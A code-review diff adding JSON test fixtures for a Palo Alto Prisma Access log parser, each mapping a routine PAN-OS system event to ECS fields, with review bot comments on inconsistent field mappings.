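Review bot: The CSV-format system event in `test_system.json` expects the firewall identity in `log.hostname`, `observer.name` and `observer.serial_number`, while every JSON-format system fixture in this patch (for example `test_ntp_sync_json.json` and `test_system_event_10_json.json`) expects only `host.name` from `LogSourceName` and never maps `LogSourceID` to `observer.serial_number`. The same device therefore appears under different ECS fields depending on the ingestion format, which breaks searches and detection rules that pivot on a single field. Unless this split is intentional, the expectations should converge, for instance by asserting `"observer": { "name": "PA-VM", "product": "PAN-OS", "serial_number": "007954000351998" }` in the JSON fixtures, with the parser changed to match.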
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json
new file mode 100644
index 000000000..8a299b691
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json
@@ -0,0 +1,49 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Successfully connect to address: 5.6.7.8 port: 3978, conn id: triallr-5.6.7.8-2-def\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:31:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:32:07.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170508,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:31:56.151000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Successfully connect to address: 5.6.7.8 port: 3978, conn id: triallr-5.6.7.8-2-def\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:31:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:32:07.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170508,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:31:56.151000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "reason": "Successfully connect to address: 5.6.7.8 port: 3978, conn id: triallr-5.6.7.8-2-def", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:31:56Z", + "action": { + "type": "general" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 3978 + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": 
"system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + }, + "related": { + "ip": [ + "5.6.7.8" + ] + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json new file mode 100644 index 000000000..4b7dc612f --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json 
@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"PAN-DB was upgraded to version 20230203.20250.\",\"EventName\": \"upgrade-url-database-success\",\"EventTime\": \"2023-02-03T16:37:22.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:37:31.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170511,\"Subtype\": \"url-filtering\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:37:22.476000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"PAN-DB was upgraded to version 20230203.20250.\",\"EventName\": \"upgrade-url-database-success\",\"EventTime\": \"2023-02-03T16:37:22.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:37:31.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170511,\"Subtype\": \"url-filtering\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:37:22.476000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "module": "PAN-DB", + "reason": "PAN-DB was upgraded to version 20230203.20250.", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:37:22Z", + "action": { + "type": "url-filtering" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + 
"DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url-filtering" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json new file mode 100644 index 000000000..7901b05ce --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json 
@@ -0,0 +1,56 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"EventName\": \"if-renew-trigger\",\"EventTime\": \"2023-02-03T16:39:46.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:39:55.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170512,\"Subtype\": \"dhcp\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:39:46.612000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"EventName\": \"if-renew-trigger\",\"EventTime\": \"2023-02-03T16:39:46.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:39:55.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170512,\"Subtype\": \"dhcp\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:39:46.612000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}", + "event": { + "category": [ + "network" + ], + "dataset": "system", + "reason": "DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:39:46Z", + "action": { + "type": "dhcp" + }, + "destination": { + "address": "1.2.3.1" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + 
"ingress": { + "interface": { + "name": "eth0" + } + }, + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "dhcp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json new file mode 100644 index 000000000..30a9a9970 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json 
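Review bot: The DHCP server `1.2.3.1` is expected only as `destination.address`, with no `destination.ip` and no entry in `related.ip`, while the leased address `1.2.3.4` gets `source.address`, `source.ip` and `related.ip`. Both values are IPv4 literals parsed from the same `EventDescription`, so an investigator pivoting on `related.ip` or `destination.ip` would not find the DHCP server. The expectation should read `"destination": { "address": "1.2.3.1", "ip": "1.2.3.1" }` and `"related": { "ip": [ "1.2.3.1", "1.2.3.4" ] }`, with the parser updated to copy the address into the ip field.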
@@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739610-742990.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:30:44.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:30:52.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170505,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:30:44.868000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739610-742990.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:30:44.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:30:52.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170505,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:30:44.868000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "Installed WildFire package: panupv3-all-wildfire-739610-742990.tgz", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:30:44Z", + "action": { + "type": "general" + }, + "file": { + "name": "panupv3-all-wildfire-739610-742990.tgz" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": 
"PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json new file mode 100644 index 000000000..f74ff5a47 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json 
@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire update job succeeded for user Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:46:05.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170521,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:56.725000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire update job succeeded for user Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:46:05.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170521,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:56.725000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "WildFire update job succeeded for user Auto update agent", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:56Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + 
"DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json new file mode 100644 index 000000000..8c122fc65 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json 
@@ -0,0 +1,48 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server: completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:51.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170515,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:51.118000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server: completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:51.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170515,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:51.118000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "reason": "Connection to Update server: completed successfully, initiated by 1.2.3.4", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:51Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + 
"DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json new file mode 100644 index 000000000..524aef010 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json 
@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job started processing. Dequeue time=2023/02/03 17:45:52. Job Id=72. \",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170518,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.888000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job started processing. Dequeue time=2023/02/03 17:45:52. Job Id=72. \",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170518,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.888000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "WildFire job started processing. Dequeue time=2023/02/03 17:45:52. Job Id=72. 
", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:52Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json new file mode 100644 index 000000000..f305c2d3e --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json 
@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire package upgraded from version 739610-742990 to 739613-742993 by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:55.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170520,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:55.982000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire package upgraded from version 739610-742990 to 739613-742993 by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:55.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170520,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:55.982000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "WildFire package upgraded from version 739610-742990 to 739613-742993 by Auto update agent", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:55Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": 
"PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json new file mode 100644 index 000000000..63f3bd258 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json 
@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job enqueued. Enqueue time=2023/02/03 17:45:52. JobId=72. . Type: Full\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170517,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job enqueued. Enqueue time=2023/02/03 17:45:52. JobId=72. . Type: Full\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170517,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "WildFire job enqueued. Enqueue time=2023/02/03 17:45:52. JobId=72. . 
Type: Full", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:52Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json new file mode 100644 index 000000000..a00e82987 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json 
@@ -0,0 +1,51 @@
+{
+ "input": {
+ "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server: updates.paloaltonetworks.com completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:49.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170514,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:49.557000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+ },
+ "expected": {
+ "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server: updates.paloaltonetworks.com completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:49.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170514,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:49.557000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+ "event": {
+ "category": [
+ "host"
+ ],
+ "dataset": "system",
+ "reason": "Connection to Update server: updates.paloaltonetworks.com completed successfully, initiated by 1.2.3.4",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2023-02-03T16:45:49Z",
+ "action": {
+ "type": "general"
+ },
+ "destination": {
+ "address": "updates.paloaltonetworks.com"
+ },
+ "host": {
+ "name": "PA-VM"
+ },
+ "log": {
+ "level": "Informational",
+ "logger": "system"
+ },
+ "observer": {
+ "product": "PAN-OS"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "Threat_ContentType": "general"
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json
new file mode 100644
index 000000000..9cb10263a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json
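Review bot: `updates.paloaltonetworks.com` is emitted only as `destination.address` and is missing from `related.hosts`, whereas test_threat.json in the same series puts the extracted domain in both `destination.domain` and `related.hosts`. A hostname pivot (`related.hosts: updates.paloaltonetworks.com`) would therefore not find this event, which is exactly the kind of outbound-connection record an analyst looks up by name. I would expect `"destination": {"address": "updates.paloaltonetworks.com", "domain": "updates.paloaltonetworks.com"}` and `"related": {"hosts": ["updates.paloaltonetworks.com"], "ip": ["1.2.3.4"]}` in the expectation. Note also that the `initiated by 1.2.3.4` address mapped to `source.ip` is presumably the firewall's own management address, so a `host.ip` mapping may be the more accurate home — worth confirming against the PAN-OS system log format.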
